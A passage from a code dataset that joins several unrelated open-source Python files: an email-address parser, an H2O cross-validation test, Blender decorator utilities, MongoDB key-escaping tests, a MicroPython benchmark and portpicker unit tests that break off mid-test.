            return False
        # check if the domain is less than 255 octets
        domn = parts[1]
        if len(domn) > 253:
            return False
        # number of labels can not be over 127
        labels = domn.split('.')
        if len(labels) > 127:
            return False
        for label in labels:
            # check the domain doesn't start or end with - and
            # the length of each label is no more than 63 octets
            if BAD_DOMAIN.search(label) or len(label) > 63:
                return False
        return True
    def _address_list_relaxed(self):
        "Grammar: address-list-relaxed -> address { delimiter address }"
        #addrs = []
        addrs = flanker.addresslib.address.AddressList()
        unparsable = []
        # address
        addr = self._address()
        if addr is None:
            # synchronize to the next delimiter (or end of line)
            # append the skipped over text to the unparsable list
            skip = self.stream.synchronize()
            if skip:
                unparsable.append(skip)
            # if no mailbox and end of stream, we were unable
            # return the unparsable stream
            if self.stream.end_of_stream():
                return [], unparsable
        else:
            # if we found a delimiter or end of stream, we have a
            # valid mailbox, add it
            if self.stream.peek(DELIMITER) or self.stream.end_of_stream():
                addrs.append(addr)
            else:
                # otherwise snychornize and add it the unparsable array
                skip = self.stream.synchronize()
                if skip:
                    pre = self.stream.stream[:self.stream.stream.index(skip)]
                    unparsable.append(pre + skip)
                # if we hit the end of the stream, return the results
                if self.stream.end_of_stream():
                    return [], [self.stream.stream]
        while True:
            # delimiter
            dlm = self.stream.get_token(DELIMITER)
            if dlm is None:
                skip = self.stream.synchronize()
                if skip:
                    unparsable.append(skip)
                if self.stream.end_of_stream():
                    break
            # address
            start_pos = self.stream.position
            addr = self._address()
            if addr is None:
                skip = self.stream.synchronize()
                if skip:
                    unparsable.append(skip)
                if self.stream.end_of_stream():
                    break
            else:
                # if we found a delimiter or end of stream, we have a
                # valid mailbox, add it
                if self.stream.peek(DELIMITER) or self.stream.end_of_stream():
                    addrs.append(addr)
                else:
                    # otherwise snychornize and add it the unparsable array
                    skip = self.stream.synchronize()
                    if skip:
                        sskip = self.stream.stream[start_pos:self.stream.position]
                        unparsable.append(sskip)
                    # if we hit the end of the stream, return the results
                    if self.stream.end_of_stream():
                        return addrs, unparsable
        return addrs, unparsable
    def _address_list_strict(self):
        "Grammar: address-list-strict -> address { delimiter address }"
        #addrs = []
        addrs = flanker.addresslib.address.AddressList()
        # address
        addr = self._address()
        if addr is None:
            return addrs
        # NOTE(review): the first address is only kept when a delimiter
        # follows it -- a single trailing address relies on the loop below;
        # verify against the callers before changing
        if self.stream.peek(DELIMITER):
            addrs.append(addr)
        while True:
            # delimiter
            dlm = self.stream.get_token(DELIMITER)
            if dlm is None:
                break
            # address
            addr = self._address()
            if addr is None:
                break
            addrs.append(addr)
        return addrs
    def _address(self):
        "Grammar: address -> name-addr-rfc | name-addr-lax | addr-spec | url"
        start_pos = self.stream.position
        addr = self._name_addr_rfc() or self._name_addr_lax() or \
            self._addr_spec() or self._url()
        # if email address, check that it passes post processing checks
        if addr and isinstance(addr, flanker.addresslib.address.EmailAddress):
            if self._mailbox_post_processing_checks(addr.address) is False:
                # roll back
                self.stream.position = start_pos
                return None
        return addr
    def _url(self):
        "Grammar: url -> url"
        earl = self.stream.get_token(URL)
        if earl is None:
            return None
        return flanker.addresslib.address.UrlAddress(to_utf8(earl))
    def _name_addr_rfc(self):
        "Grammar: name-addr-rfc -> [ display-name-rfc ] angle-addr-rfc"
        start_pos = self.stream.position
        # optional displayname
        dname = self._display_name_rfc()
        aaddr = self._angle_addr_rfc()
        if aaddr is None:
            # roll back
            self.stream.position = start_pos
            return None
        if dname:
            return flanker.addresslib.address.EmailAddress(dname, aaddr)
        return flanker.addresslib.address.EmailAddress(None, aaddr)
    def _display_name_rfc(self):
        "Grammar: display-name-rfc -> [ whitespace ] word { whitespace word }"
        wrds = []
        # optional whitespace
        self._whitespace()
        # word
        wrd = self._word()
        if wrd is None:
            return None
        wrds.append(wrd)
        while True:
            # whitespace
            wtsp = self._whitespace()
            if wtsp is None:
                break
            wrds.append(wtsp)
            # word
            wrd = self._word()
            if wrd is None:
                break
            wrds.append(wrd)
        return cleanup_display_name(''.join(wrds))
    def _angle_addr_rfc(self):
        '''
        Grammar: angle-addr-rfc -> [ whitespace ] < addr-spec > [ whitespace ]"
        '''
        start_pos = self.stream.position
        # optional whitespace
        self._whitespace()
        # left angle bracket
        lbr = self.stream.get_token(LBRACKET)
        if lbr is None:
            # rollback
            self.stream.position = start_pos
            return None
        # addr-spec
        aspec = self._addr_spec(True)
        if aspec is None:
            # rollback
            self.stream.position = start_pos
            return None
        # right angle bracket
        rbr = self.stream.get_token(RBRACKET)
        if rbr is None:
            # rollback
            self.stream.position = start_pos
            return None
        # optional whitespace
        self._whitespace()
        return aspec
    def _name_addr_lax(self):
        "Grammar: name-addr-lax -> [ display-name-lax ] angle-addr-lax"
        start_pos = self.stream.position
        # optional displayname
        dname = self._display_name_lax()
        aaddr = self._angle_addr_lax()
        if aaddr is None:
            # roll back
            self.stream.position = start_pos
            return None
        if dname:
            return flanker.addresslib.address.EmailAddress(dname, aaddr)
        return flanker.addresslib.address.EmailAddress(None, aaddr)
    def _display_name_lax(self):
        '''
        Grammar: display-name-lax ->
            [ whitespace ] word { whitespace word } whitespace"
        '''
        start_pos = self.stream.position
        wrds = []
        # optional whitespace
        self._whitespace()
        # word
        wrd = self._word()
        if wrd is None:
            # roll back
            self.stream.position = start_pos
            return None
        wrds.append(wrd)
        # peek to see if we have a whitespace,
        # if we don't, we have a invalid display-name
        # NOTE(review): because of the `or`, this only proceeds when the
        # lookahead matches BOTH the ASCII and the unicode whitespace
        # patterns -- assumes UNI_WHITE also matches ASCII whitespace;
        # verify against the tokenizer before changing
        if self.stream.peek(WHITESPACE) is None or \
                self.stream.peek(UNI_WHITE) is None:
            self.stream.position = start_pos
            return None
        while True:
            # whitespace
            wtsp = self._whitespace()
            if wtsp:
                wrds.append(wtsp)
            # if we need to roll back the next word
            start_pos = self.stream.position
            # word
            wrd = self._word()
            if wrd is None:
                self.stream.position = start_pos
                break
            wrds.append(wrd)
            # peek to see if we have a whitespace
            # if we don't pop off the last word break
            if self.stream.peek(WHITESPACE) is None or \
                    self.stream.peek(UNI_WHITE) is None:
                # roll back last word
                self.stream.position = start_pos
                wrds.pop()
                break
        return cleanup_display_name(''.join(wrds))
    def _angle_addr_lax(self):
        "Grammar: angle-addr-lax -> addr-spec [ whitespace ]"
        start_pos = self.stream.position
        # addr-spec
        aspec = self._addr_spec(True)
        if aspec is None:
            # rollback
            self.stream.position = start_pos
            return None
        # optional whitespace
        self._whitespace()
        return aspec
    def _addr_spec(self, as_string=False):
        '''
        Grammar: addr-spec -> [ whitespace ] local-part @ domain [ whitespace ]
        Returns a string when as_string is True, otherwise an EmailAddress.
        '''
        start_pos = self.stream.position
        # optional whitespace
        self._whitespace()
        lpart = self._local_part()
        if lpart is None:
            # rollback
            self.stream.position = start_pos
            return None
        asym = self.stream.get_token(AT_SYMBOL)
        if asym is None:
            # rollback
            self.stream.position = start_pos
            return None
        domn = self._domain()
        if domn is None:
            # rollback
            self.stream.position = start_pos
            return None
        # optional whitespace
        self._whitespace()
        aspec = cleanup_email(''.join([lpart, asym, domn]))
        if as_string:
            return aspec
        return flanker.addresslib.address.EmailAddress(None, aspec)
    def _local_part(self):
        "Grammar: local-part -> dot-atom | quoted-string"
        return self.stream.get_token(DOT_ATOM) or \
            self.stream.get_token(QSTRING)
    def _domain(self):
        "Grammar: domain -> dot-atom"
        return self.stream.get_token(DOT_ATOM)
    def _word(self):
        "Grammar: word -> word-ascii | word-unicode"
        start_pos = self.stream.position
        # ascii word
        ascii_wrd = self._word_ascii()
        if ascii_wrd and not self.stream.peek(UNI_ATOM):
            return ascii_wrd
        # didn't get an ascii word, rollback to try again
        self.stream.position = start_pos
        # unicode word
        return self._word_unicode()
    def _word_ascii(self):
        "Grammar: word-ascii -> atom | qstring"
        wrd = self.stream.get_token(RELAX_ATOM) or self.stream.get_token(QSTRING)
        if wrd and not contains_control_chars(wrd):
            return wrd
        return None
    def _word_unicode(self):
        "Grammar: word-unicode -> unicode-atom | unicode-qstring"
        start_pos = self.stream.position
        # unicode atom
        uwrd = self.stream.get_token(UNI_ATOM)
        if uwrd and isinstance(uwrd, unicode) and not contains_control_chars(uwrd):
            return uwrd
        # unicode qstr
        uwrd = self.stream.get_token(UNI_QSTR, 'qstr')
        if uwrd and isinstance(uwrd, unicode) and not contains_control_chars(uwrd):
            # RFC 2047-encode the quoted content before wrapping in quotes
            return u'"{0}"'.format(encode_string(None, uwrd))
        # rollback
        self.stream.position = start_pos
        return None
    def _whitespace(self):
        "Grammar: whitespace -> whitespace-ascii | whitespace-unicode"
        return self._whitespace_ascii() or self._whitespace_unicode()
    def _whitespace_ascii(self):
        "Grammar: whitespace-ascii -> whitespace-ascii"
        return self.stream.get_token(WHITESPACE)
    def _whitespace_unicode(self):
        "Grammar: whitespace-unicode -> whitespace-unicode"
        uwhite = self.stream.get_token(UNI_WHITE)
        if uwhite and not is_pure_ascii(uwhite):
            return uwhite
        return None
class ParserException(Exception):
    '''
    Raised when the parser encounters input it is unable to handle, for
    example empty input, non-ASCII bytes in an ASCII string, or input that
    exceeds the configured length limits.
    '''
    def __init__(self, reason='Unknown parser error.'):
        Exception.__init__(self, reason)
        self.reason = reason
    def __str__(self):
        return self.reason
# upper bound on the length of a single address accepted by the parser
MAX_ADDRESS_LENGTH = 512
# upper bound on the number of addresses in one list
MAX_ADDRESS_NUMBER = 1024
# derived cap on the raw input length for address_list(), used to keep the
# relaxed parser from spinning on pathological input
MAX_ADDRESS_LIST_LENGTH = MAX_ADDRESS_LENGTH * MAX_ADDRESS_NUMBER
| alex/flanker | flanker/addresslib/parser.py | Python | apache-2.0 | 20,067 |
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
import random
import inspect
def cv_carsGBM():
    """Exercise GBM cross-validation on the cars dataset: Modulo vs Random
    fold assignment, fold_column, keep_cross_validation_predictions, and a
    set of boundary and expected-error cases. Requires a running H2O cloud.
    """
    # read in the dataset and construct training set (and validation set)
    cars = h2o.import_file(path=pyunit_utils.locate("smalldata/junit/cars_20mpg.csv"))
    # choose the type model-building exercise (multinomial classification or regression). 0:regression, 1:binomial,
    # 2:multinomial
    problem = random.sample(range(3),1)[0]
    # pick the predictors and response column, along with the correct distribution
    predictors = ["displacement","power","weight","acceleration","year"]
    if problem == 1 :
        response_col = "economy_20mpg"
        distribution = "bernoulli"
        cars[response_col] = cars[response_col].asfactor()
    elif problem == 2 :
        response_col = "cylinders"
        distribution = "multinomial"
        cars[response_col] = cars[response_col].asfactor()
    else :
        response_col = "economy"
        distribution = "gaussian"
    print "Distribution: {0}".format(distribution)
    print "Response column: {0}".format(response_col)
    ## cross-validation
    # 1. check that cv metrics are the same over repeated "Modulo" runs
    nfolds = random.randint(3,10)
    gbm1 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=nfolds, distribution=distribution, ntrees=5,
                   fold_assignment="Modulo")
    gbm2 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=nfolds, distribution=distribution, ntrees=5,
                   fold_assignment="Modulo")
    pyunit_utils.check_models(gbm1, gbm2, True)
    # 2. check that cv metrics are different over repeated "Random" runs
    nfolds = random.randint(3,10)
    gbm1 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=nfolds, distribution=distribution, ntrees=5,
                   fold_assignment="Random")
    gbm2 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=nfolds, distribution=distribution, ntrees=5,
                   fold_assignment="Random")
    try:
        pyunit_utils.check_models(gbm1, gbm2, True)
        assert False, "Expected models to be different over repeated Random runs"
    except AssertionError:
        assert True
    # 3. folds_column
    num_folds = random.randint(2,5)
    fold_assignments = h2o.H2OFrame([[random.randint(0,num_folds-1) for f in range(cars.nrow)]])
    fold_assignments.set_names(["fold_assignments"])
    cars = cars.cbind(fold_assignments)
    gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], training_frame=cars, distribution=distribution, ntrees=5,
                  fold_column="fold_assignments", keep_cross_validation_predictions=True)
    num_cv_models = len(gbm._model_json['output']['cross_validation_models'])
    assert num_cv_models==num_folds, "Expected {0} cross-validation models, but got " \
                                     "{1}".format(num_folds, num_cv_models)
    # NOTE(review): cv_model1/cv_model2 are fetched but never asserted on --
    # presumably this just checks the fold models are retrievable; confirm
    cv_model1 = h2o.get_model(gbm._model_json['output']['cross_validation_models'][0]['name'])
    cv_model2 = h2o.get_model(gbm._model_json['output']['cross_validation_models'][1]['name'])
    # 4. keep_cross_validation_predictions
    # gbm1 was built without keep_cross_validation_predictions, so None here
    cv_predictions = gbm1._model_json['output']['cross_validation_predictions']
    assert cv_predictions is None, "Expected cross-validation predictions to be None, but got {0}".format(cv_predictions)
    cv_predictions = gbm._model_json['output']['cross_validation_predictions']
    assert len(cv_predictions)==num_folds, "Expected the same number of cross-validation predictions " \
                                           "as folds, but got {0}".format(len(cv_predictions))
    # # 5. manually construct models
    # fold1 = cars[cars["fold_assignments"]==0]
    # fold2 = cars[cars["fold_assignments"]==1]
    # manual_model1 = h2o.gbm(y=fold2[response_col],
    #                         x=fold2[predictors],
    #                         validation_y=fold1[response_col],
    #                         validation_x=fold1[predictors], ntrees=5,
    #                         distribution=distribution)
    # manual_model2 = h2o.gbm(y=fold1[response_col],
    #                         x=fold1[predictors],
    #                         validation_y=fold2[response_col],
    #                         validation_x=fold2[predictors], ntrees=5,
    #                         distribution=distribution)
    ## boundary cases
    # 1. nfolds = number of observations (leave-one-out cross-validation)
    gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=cars.nrow, distribution=distribution, ntrees=5,
                  fold_assignment="Modulo")
    # 2. nfolds = 0
    gbm1 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=0, distribution=distribution, ntrees=5)
    # check that this is equivalent to no nfolds
    gbm2 = h2o.gbm(y=cars[response_col], x=cars[predictors], distribution=distribution, ntrees=5)
    pyunit_utils.check_models(gbm1, gbm2)
    # 3. cross-validation and regular validation attempted
    gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=random.randint(3,10), validation_y=cars[response_col], ntrees=5,
                  validation_x=cars[predictors], distribution=distribution)
    ## error cases
    # 1. nfolds == 1 or < 0
    try:
        gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=random.sample([-1,1], 1)[0], ntrees=5,
                      distribution=distribution)
        assert False, "Expected model-build to fail when nfolds is 1 or < 0"
    except EnvironmentError:
        assert True
    # 2. more folds than observations
    try:
        gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=cars.nrow+1, distribution=distribution, ntrees=5,
                      fold_assignment="Modulo")
        assert False, "Expected model-build to fail when nfolds > nobs"
    except EnvironmentError:
        assert True
    # 3. fold_column and nfolds both specified
    try:
        gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=3, fold_column="fold_assignments", ntrees=5,
                      distribution=distribution, training_frame=cars)
        assert False, "Expected model-build to fail when fold_column and nfolds both specified"
    except EnvironmentError:
        assert True
    # 4. fold_column and fold_assignment both specified
    try:
        gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], fold_assignment="Random", fold_column="fold_assignments", ntrees=5,
                      distribution=distribution, training_frame=cars)
        assert False, "Expected model-build to fail when fold_column and fold_assignment both specified"
    except EnvironmentError:
        assert True
if __name__ == "__main__":
    # executed directly: presumably standalone_test sets up the H2O cloud
    # around the test -- see pyunit_utils
    pyunit_utils.standalone_test(cv_carsGBM)
else:
    # imported by the test runner: the cloud already exists, just run
    cv_carsGBM()
| madmax983/h2o-3 | h2o-py/tests/testdir_algos/gbm/pyunit_DEPRECATED_cv_carsGBM.py | Python | apache-2.0 | 6,858 |
# Copyright (C) 2020 Christopher Gearhart
# chris@bblanimation.com
# http://bblanimation.com/
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# System imports
import time
import sys
# Blender imports
import bpy
# Module imports
from .reporting import stopwatch
# https://github.com/CGCookie/retopoflow
def timed_call(label="Time Elapsed", precision=2):
    """Decorator factory: report the wall-clock duration of each call.

    The elapsed time is reported through ``stopwatch`` under *label*,
    rounded to *precision* decimal places; the wrapped function's return
    value is passed through unchanged.
    """
    def decorator(fn):
        def inner(*args, **kwargs):
            started = time.time()
            result = fn(*args, **kwargs)
            stopwatch(label, started, precision=precision)
            return result
        return inner
    return decorator
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
    """Decorator factory: register the decorated function as the
    implementation to use when the running Blender version satisfies
    ``<op> <ver>`` (e.g. ``@blender_version_wrapper('>=', '2.80')``).
    Functions decorated under the same name share one dispatch table, so
    exactly one registered variant is called at runtime.
    """
    self = blender_version_wrapper
    # one-time setup: memoize the comparison table on the function object
    if not hasattr(self, "init"):
        major, minor, rev = bpy.app.version
        # zero-padded "major.minor" string, e.g. "2.80"
        blenderver = "%d.%02d" % (major, minor)
        self.fns = {}
        # NOTE(review): these are lexicographic string comparisons; they
        # hold while major versions stay single-digit -- verify before
        # Blender 10
        self.ops = {
            "<": lambda v: blenderver < v,
            ">": lambda v: blenderver > v,
            "<=": lambda v: blenderver <= v,
            "==": lambda v: blenderver == v,
            ">=": lambda v: blenderver >= v,
            "!=": lambda v: blenderver != v,
        }
        self.init = True
    # True when the running version matches this registration
    update_fn = self.ops[op](ver)
    fns = self.fns
    def wrapit(fn):
        n = fn.__name__
        # only the matching variant is stored in the dispatch table
        if update_fn:
            fns[n] = fn
        def callit(*args, **kwargs):
            return fns[n](*args, **kwargs)
        return callit
    return wrapit
# This program shows off a python decorator(
# which implements tail call optimization. It
# does this by throwing an exception if it is
# its own grandparent, and catching such
# exceptions to recall the stack.
# https://code.activestate.com/recipes/474088-tail-call-optimization-decorator/
class TailRecurseException(Exception):
    """Raised by a tail_call_optimized trampoline to unwind and restart the call."""

    def __init__(self, args, kwargs):
        self.args = args
        self.kwargs = kwargs


def tail_call_optimized(g):
    """Decorate *g* with tail-call optimization.

    Whenever the decorated function re-enters itself in tail position, its
    frame's grandparent has the same code object; we detect that, raise
    TailRecurseException carrying the new arguments, and catch it one level
    up to re-invoke *g* -- so the Python stack never grows.  Fails if the
    decorated function recurses in a non-tail context.
    """
    def trampoline(*args, **kwargs):
        frame = sys._getframe()
        parent = frame.f_back
        grandparent = parent.f_back if parent else None
        if grandparent is not None and grandparent.f_code == frame.f_code:
            # Recursive re-entry: unwind back to the outer trampoline call.
            raise TailRecurseException(args, kwargs)
        while True:
            try:
                return g(*args, **kwargs)
            except TailRecurseException as exc:
                args, kwargs = exc.args, exc.kwargs
    trampoline.__doc__ = g.__doc__
    return trampoline
# # USAGE:
# @tail_call_optimized
# def factorial(n, acc=1):
# "calculate a factorial"
# if n == 0:
# return acc
# return factorial(n-1, n*acc)
#
# print factorial(10000)
# # prints a big, big number,
# # but doesn't hit the recursion limit.
#
# @tail_call_optimized
# def fib(i, current = 0, next = 1):
# if i == 0:
# return current
# else:
# return fib(i - 1, next, current + next)
#
# print fib(10000)
# # also prints a big number,
# # but doesn't hit the recursion limit.
| feureau/Small-Scripts | Blender/Blender config/2.91/scripts/addons/bricksculpt_v1-2-0/functions/common/wrappers.py | Python | gpl-3.0 | 3,894 |
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from st2common.util import mongoescape
class TestMongoEscape(unittest.TestCase):
    """Round-trip tests for mongoescape's MongoDB key escaping ('.' and '$')."""

    def test_unnested(self):
        original = {'k1.k1.k1': 'v1', 'k2$': 'v2', '$k3.': 'v3'}
        escaped = mongoescape.escape_chars(original)
        expected = {
            u'k1\uff0ek1\uff0ek1': 'v1',
            u'k2\uff04': 'v2',
            u'\uff04k3\uff0e': 'v3',
        }
        self.assertEqual(escaped, expected, 'Escaping failed.')
        self.assertEqual(mongoescape.unescape_chars(escaped), original,
                         'Unescaping failed.')

    def test_nested(self):
        inner = {'nk1.nk1.nk1': 'v1', 'nk2$': 'v2', '$nk3.': 'v3'}
        outer = {'k1.k1.k1': inner, 'k2$': 'v2', '$k3.': 'v3'}
        escaped = mongoescape.escape_chars(outer)
        expected = {
            u'k1\uff0ek1\uff0ek1': {
                u'\uff04nk3\uff0e': 'v3',
                u'nk1\uff0enk1\uff0enk1': 'v1',
                u'nk2\uff04': 'v2',
            },
            u'k2\uff04': 'v2',
            u'\uff04k3\uff0e': 'v3',
        }
        self.assertEqual(escaped, expected, 'un-escaping failed.')
        self.assertEqual(mongoescape.unescape_chars(escaped), outer,
                         'Unescaping failed.')

    def test_unescaping_of_rule_criteria(self):
        # Dots in rule criteria used to be escaped with u'\u2024' (one dot
        # leader) rather than the current u'\uff0e'; unescape_chars must
        # still be able to undo the legacy form.
        legacy_escaped = {
            u'k1\u2024k1\u2024k1': 'v1',
            u'k2$': 'v2',
            u'$k3\u2024': 'v3'
        }
        expected = {
            'k1.k1.k1': 'v1',
            'k2$': 'v2',
            '$k3.': 'v3'
        }
        self.assertEqual(mongoescape.unescape_chars(legacy_escaped), expected)
| jtopjian/st2 | st2common/tests/unit/test_mongoescape.py | Python | apache-2.0 | 2,640 |
import bench
from _collections import namedtuple
T = namedtuple("Tup", ["foo1", "foo2", "foo3", "foo4", "num"])
def test(num):
    # Micro-benchmark: attribute access on the 5th field of a namedtuple
    # inside a tight loop.  The loop bound deliberately reads t.num on every
    # iteration so each comparison pays for a namedtuple attribute lookup.
    # NOTE(review): `num` (presumably an iteration budget from bench.run) is
    # ignored; the 20000000 constant controls the workload -- confirm intent.
    t = T(0, 0, 0, 0, 20000000)
    i = 0
    while i < t.num:
        i += 1
bench.run(test)
| martinribelotta/micropython | tests/bench/var-8.1-namedtuple-5th.py | Python | mit | 224 |
#!/usr/bin/python
#
# Copyright 2007 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unittests for the portpicker module."""
from __future__ import print_function
import errno
import os
import random
import socket
import sys
import unittest
from contextlib import ExitStack
if sys.platform == 'win32':
import _winapi
else:
_winapi = None
try:
# pylint: disable=no-name-in-module
from unittest import mock # Python >= 3.3.
except ImportError:
import mock # https://pypi.python.org/pypi/mock
import portpicker
class PickUnusedPortTest(unittest.TestCase):
    """Tests for portpicker: live port allocation plus mocked portserver paths.

    Several tests are inherently flaky without a portserver (the OS may hand
    out or reclaim ports concurrently), so they retry and assert a success
    rate rather than perfection.
    """

    def IsUnusedTCPPort(self, port):
        # True if we can currently bind `port` for TCP.
        return self._bind(port, socket.SOCK_STREAM, socket.IPPROTO_TCP)

    def IsUnusedUDPPort(self, port):
        # True if we can currently bind `port` for UDP.
        return self._bind(port, socket.SOCK_DGRAM, socket.IPPROTO_UDP)

    def setUp(self):
        # So we can Bind even if portpicker.bind is stubbed out.
        self._bind = portpicker.bind
        # Reset portpicker's module-level bookkeeping between tests.
        portpicker._owned_ports.clear()
        portpicker._free_ports.clear()
        portpicker._random_ports.clear()

    def testPickUnusedPortActuallyWorks(self):
        """This test can be flaky."""
        for _ in range(10):
            port = portpicker.pick_unused_port()
            self.assertTrue(self.IsUnusedTCPPort(port))
            self.assertTrue(self.IsUnusedUDPPort(port))

    @unittest.skipIf('PORTSERVER_ADDRESS' not in os.environ,
                     'no port server to test against')
    def testPickUnusedCanSuccessfullyUsePortServer(self):

        with mock.patch.object(portpicker, '_pick_unused_port_without_server'):
            portpicker._pick_unused_port_without_server.side_effect = (
                Exception('eek!')
            )

            # Since _PickUnusedPortWithoutServer() raises an exception, if we
            # can successfully obtain a port, the portserver must be working.
            port = portpicker.pick_unused_port()
            self.assertTrue(self.IsUnusedTCPPort(port))
            self.assertTrue(self.IsUnusedUDPPort(port))

    @unittest.skipIf('PORTSERVER_ADDRESS' not in os.environ,
                     'no port server to test against')
    def testPickUnusedCanSuccessfullyUsePortServerAddressKwarg(self):

        with mock.patch.object(portpicker, '_pick_unused_port_without_server'):
            portpicker._pick_unused_port_without_server.side_effect = (
                Exception('eek!')
            )

            # Since _PickUnusedPortWithoutServer() raises an exception, and
            # we've temporarily removed PORTSERVER_ADDRESS from os.environ, if
            # we can successfully obtain a port, the portserver must be working.
            addr = os.environ.pop('PORTSERVER_ADDRESS')
            try:
                port = portpicker.pick_unused_port(portserver_address=addr)
                self.assertTrue(self.IsUnusedTCPPort(port))
                self.assertTrue(self.IsUnusedUDPPort(port))
            finally:
                os.environ['PORTSERVER_ADDRESS'] = addr

    @unittest.skipIf('PORTSERVER_ADDRESS' not in os.environ,
                     'no port server to test against')
    def testGetPortFromPortServer(self):
        """Exercise the get_port_from_port_server() helper function."""
        for _ in range(10):
            port = portpicker.get_port_from_port_server(
                os.environ['PORTSERVER_ADDRESS'])
            self.assertTrue(self.IsUnusedTCPPort(port))
            self.assertTrue(self.IsUnusedUDPPort(port))

    def testSendsPidToPortServer(self):
        # The portserver protocol: the client writes "<pid>\n" and reads back
        # the allocated port.  On Windows that happens over a named pipe
        # (_winapi), elsewhere over a socket.
        with ExitStack() as stack:
            if _winapi:
                create_file_mock = mock.Mock()
                create_file_mock.return_value = 0
                read_file_mock = mock.Mock()
                write_file_mock = mock.Mock()
                read_file_mock.return_value = (b'42768\n', 0)
                stack.enter_context(
                    mock.patch('_winapi.CreateFile', new=create_file_mock))
                stack.enter_context(
                    mock.patch('_winapi.WriteFile', new=write_file_mock))
                stack.enter_context(
                    mock.patch('_winapi.ReadFile', new=read_file_mock))
                port = portpicker.get_port_from_port_server(
                    'portserver', pid=1234)
                write_file_mock.assert_called_once_with(0, b'1234\n')
            else:
                server = mock.Mock()
                server.recv.return_value = b'42768\n'
                stack.enter_context(
                    mock.patch.object(socket, 'socket', return_value=server))
                port = portpicker.get_port_from_port_server(
                    'portserver', pid=1234)
                server.sendall.assert_called_once_with(b'1234\n')
        self.assertEqual(port, 42768)

    def testPidDefaultsToOwnPid(self):
        # When no pid= is passed, the client must send os.getpid().
        with ExitStack() as stack:
            stack.enter_context(
                mock.patch.object(os, 'getpid', return_value=9876))
            if _winapi:
                create_file_mock = mock.Mock()
                create_file_mock.return_value = 0
                read_file_mock = mock.Mock()
                write_file_mock = mock.Mock()
                read_file_mock.return_value = (b'52768\n', 0)
                stack.enter_context(
                    mock.patch('_winapi.CreateFile', new=create_file_mock))
                stack.enter_context(
                    mock.patch('_winapi.WriteFile', new=write_file_mock))
                stack.enter_context(
                    mock.patch('_winapi.ReadFile', new=read_file_mock))
                port = portpicker.get_port_from_port_server('portserver')
                write_file_mock.assert_called_once_with(0, b'9876\n')
            else:
                server = mock.Mock()
                server.recv.return_value = b'52768\n'
                stack.enter_context(
                    mock.patch.object(socket, 'socket', return_value=server))
                port = portpicker.get_port_from_port_server('portserver')
                server.sendall.assert_called_once_with(b'9876\n')
        self.assertEqual(port, 52768)

    @mock.patch.dict(os.environ,{'PORTSERVER_ADDRESS': 'portserver'})
    def testReusesPortServerPorts(self):
        # A returned portserver port must be handed out again in preference
        # to asking the portserver for a new one.
        with ExitStack() as stack:
            if _winapi:
                read_file_mock = mock.Mock()
                read_file_mock.side_effect = [
                    (b'12345\n', 0),
                    (b'23456\n', 0),
                    (b'34567\n', 0),
                ]
                stack.enter_context(mock.patch('_winapi.CreateFile'))
                stack.enter_context(mock.patch('_winapi.WriteFile'))
                stack.enter_context(
                    mock.patch('_winapi.ReadFile', new=read_file_mock))
            else:
                server = mock.Mock()
                server.recv.side_effect = [b'12345\n', b'23456\n', b'34567\n']
                stack.enter_context(
                    mock.patch.object(socket, 'socket', return_value=server))
            self.assertEqual(portpicker.pick_unused_port(), 12345)
            self.assertEqual(portpicker.pick_unused_port(), 23456)
            portpicker.return_port(12345)
            self.assertEqual(portpicker.pick_unused_port(), 12345)

    @mock.patch.dict(os.environ,{'PORTSERVER_ADDRESS': ''})
    def testDoesntReuseRandomPorts(self):
        # Without a portserver, returned ports should NOT be preferentially
        # reused (they are only randomly rediscovered).
        ports = set()
        for _ in range(10):
            try:
                port = portpicker.pick_unused_port()
            except portpicker.NoFreePortFoundError:
                # This sometimes happens when not using portserver.  Just
                # skip to the next attempt.
                continue
            ports.add(port)
            portpicker.return_port(port)
        self.assertGreater(len(ports), 5)  # Allow some random reuse.

    def testReturnsReservedPorts(self):
        # A returned reserved port goes back into the reserved pool and is
        # handed out again before anything else.
        with mock.patch.object(portpicker, '_pick_unused_port_without_server'):
            portpicker._pick_unused_port_without_server.side_effect = (
                Exception('eek!'))
            # Arbitrary port. In practice you should get this from somewhere
            # that assigns ports.
            reserved_port = 28465
            portpicker.add_reserved_port(reserved_port)
            ports = set()
            for _ in range(10):
